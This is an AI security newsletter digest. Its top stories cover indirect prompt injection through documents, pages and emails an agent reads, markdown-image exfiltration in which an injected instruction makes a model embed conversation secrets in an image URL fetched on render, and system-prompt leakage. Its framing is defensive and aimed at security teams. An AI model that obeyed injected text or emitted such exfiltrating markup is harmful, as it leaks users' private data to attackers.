AI Sec Weekly: Friday, May 15, 2026
This week's digest: indirect injection becomes the agent-era default, the markdown-rendering data-exfiltration class, and why system-prompt secrecy keeps failing. Plus one regulatory item, one technical item, and the reading list. Verify specifics against primary sources.
Friday digest. Same structure as always — three top stories, one regulatory item, one technical item, the reading list, corrections. Per how this works, I rank ruthlessly and leave out anything I can’t stand behind. Where a claim depends on a CVE, version, or date, verify it against the primary source before you act; this digest is analysis, not an advisory feed.
Top three
1. Indirect prompt injection is now the agent era’s default vulnerability — treat it as a design property. The week’s most useful framing, which I wrote up separately, is that the injection that matters no longer arrives in the user’s message box. It arrives in the page an agent fetched, the email it summarized, the document a user uploaded, the record it pulled from a “trusted” store. In an agent architecture this is closer to a design property than a bug, because to the model the system prompt, the user request, and the retrieved document are the same kind of thing — tokens. You cannot make the model immune; you can make a successful injection not matter, through privilege separation, untrusted-by-default model output, and human-in-the-loop gates on irreversible actions. If you only red-team the chat box, you’re measuring the wrong surface.
2. LLM chatbots leak data through their own rendered output. The data-exfiltration class worth internalizing this week is the one where the model never “sends” anything itself — it just emits markdown, and the renderer makes the request. An injected instruction gets the model to embed an image (or link) whose URL encodes secrets from the conversation; when the client renders that markdown, it fetches the attacker’s URL and the secrets ride along in the query string. The fix isn’t at the model layer at all — it’s constraining what the rendering surface is allowed to auto-fetch (content-security policy, disallowing arbitrary external image loads, stripping or sandboxing model-emitted markup). I covered the mechanics here. The lesson that generalizes: the model’s output is an untrusted string, and anything downstream that auto-acts on it is part of your attack surface.
3. System-prompt secrecy keeps failing, and the OWASP 2025 list finally said so. The recurring own-goal is teams treating the system prompt as a secret and building product logic that assumes it stays one. It does not — it’s recoverable by a determined user. The 2025 OWASP LLM Top 10 promoting system-prompt leakage to its own category is an acknowledgment that this kept biting people. The correct posture, restated because it bears repeating: design as if the prompt leaks on day one. No credentials, no internal URLs, no unredacted business rules in there. See my breakdown of what changed in the 2025 list.
Regulatory item
The EU AI Act is a phased schedule, not a single deadline — inventory by risk category now. The Act applies in stages: prohibited practices first, general-purpose-model obligations next, and the bulk of high-risk obligations later. The practical action for compliance and security teams is unchanged and worth doing this week: classify which of your systems fall into which risk tier, then track the specific application date for that tier against the official text ↗. I’m deliberately not quoting a single date — the schedule has moving parts and the official source is authoritative. The security-relevant obligations (risk management, logging, robustness, human oversight) are the ones to start mapping controls against.
Technical item
Adopt MITRE ATLAS as your finding taxonomy. Not a release, a recommendation: MITRE ATLAS ↗ is an established, maintained knowledge base of adversarial techniques against ML systems, structured like ATT&CK. It remains underused relative to its value. The concrete step: tag your next AI red-team finding with the relevant ATLAS technique. Six months of consistently tagged findings is a far more useful corpus than six months of prose, and it makes results comparable across engagements. Pair it with the OWASP LLM Top 10 for the application-layer view.
The reading list
Links worth your time that didn’t make the top three. One line each: who, what, why bother.
- OWASP GenAI Security Project ↗ — the umbrella behind the LLM Top 10. Why bother: the canonical, vendor-neutral starting point for LLM application risk.
- MITRE ATLAS ↗ — adversarial technique knowledge base for AI. Why bother: the shared vocabulary your red and blue teams should both be using.
- NIST AI Risk Management Framework ↗ — the Govern/Map/Measure/Manage structure plus the Generative AI Profile. Why bother: the governance wrapper leadership and auditors recognize.
- OWASP LLM Top 10 ↗ — the 2025 revision. Why bother: re-read the system-prompt-leakage and supply-chain entries specifically.
Corrections
Nothing to correct from last week’s digest. As always, if I get something wrong, it gets fixed here with a visible note — I don’t quietly amend.
If you have a tip — a vendor advisory, a regulator action, a CVE pre-disclosure — reply to the digest. Sources protected.
— Theo
Sources
AI Sec Weekly — in your inbox
Weekly digest of AI security news and analysis. — delivered when there's something worth your inbox.
No spam. Unsubscribe anytime.
Related
How LLM Chatbots Leak Data Through Their Own Rendered Output
A recurring AI-security finding: an injected instruction makes the model emit a markdown image whose URL carries the user's data to an attacker server. Why this works, why CSP is the real fix, and what to check this week.
Indirect Prompt Injection: The Agent Era's Default Vulnerability
As LLM agents gained tools and memory, the dangerous injection stopped coming from the user and started coming from the data the agent reads. A defender's breakdown of why this class resists patching and what containment looks like.
AI Sec Weekly: Friday, May 22, 2026
This week's digest: SSRF through agent tool-use, the model supply-chain class and why safetensors matters, and model extraction as a business risk. Plus one regulatory item, one technical item, and the reading list. Verify specifics against primary sources.